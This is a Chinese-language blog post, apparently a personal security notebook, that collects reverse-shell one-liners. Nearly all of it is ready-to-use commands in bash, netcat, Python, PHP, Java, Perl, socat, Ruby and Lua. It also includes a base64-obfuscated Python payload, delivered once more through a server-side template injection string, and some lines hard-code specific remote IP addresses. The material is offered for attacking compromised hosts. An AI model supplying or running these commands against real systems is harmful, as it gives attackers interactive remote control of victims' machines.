记录一些反弹shell的指令

一篇水文

 Von's Blog     2020-01-12   3002 words    & views

什么是反弹shell

反弹shell在我看来就是攻击者输入命令,命令在被攻击端执行,并将执行后得到的结果回显到攻击端的过程。
在目前看来似乎主要用在命令执行上,当网页没有直接回显时我们可以使用反弹shell在我们自己服务端对被攻击端执行代码。
关于反弹shell的主要原理我就不在这细讲了。具体的可以看这几篇文章:

panda1g师兄的文章1
panda1g师兄的文章2
K0rz3n师兄的文章1
K0rz3n师兄的文章2

反弹shell的指令

本文仅记录一些反弹shell的指令:

bash反弹shell

bash -i &> /dev/tcp/ip/port 0>&1

nc反弹shell

nc支持-e

nc -e /bin/bash ip port 

nc不支持-e

由于-e命令太危险,很多nc在安装时就已经把-e命令去掉了.我们可以采用监听两个端口来解决。
攻击机:

nc -l -vv -p port1
nc -l -vv -p port2 

受害机:

nc ip port1 |/bin/bash| nc ip port2

python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.103.22.65",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
"

也可以这样写:

python -c "exec(\'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIzOS4xMDguMTgwLjE3MSIgICAgICA7ICAgIHBvcnQ9NTY3ODkgICAgICA7ICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QscG9ydCkpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDIpICAgICAgOyAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=\'.decode(\'base64\'))"

php反弹shell

PHP -f 
$s = fsockopen("ip",port);
exec('/bin/bash -i  0>&3 1>&3 2>&3');

(注意单双引号)

java反弹shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.31.41/8080;
cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

perl反弹shell

perl -e 'use Socket;$i="192.168.31.41";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

SSTI反弹shell


也可以这样写:

[].__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('python -c "exec(\'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIzOS4xMDguMTgwLjE3MSIgICAgICA7ICAgIHBvcnQ9NTY3ODkgICAgICA7ICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgICBzLmNvbm5lY3QoKGhvc3QscG9ydCkpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDIpICAgICAgOyAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=\'.decode(\'base64\'))"')

socat反弹shell

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<你的IP>:<你的端口>

ruby反弹shell

ruby -rsocket -e'f=TCPSocket.open("<你的IP>",<你的端口>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

不依赖于/bin/sh的shell

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<你的IP>","<你的端口>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

如果目标系统运行Windows

ruby -rsocket -e 'c=TCPSocket.new("<你的IP>","<你的端口>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

lua反弹shell

lua -e "require('socket');require('os');t=socket.tcp();t:connect('<你的IP>','<你的端口>');os.execute('/bin/sh -i <&3 >&3 2>&3');"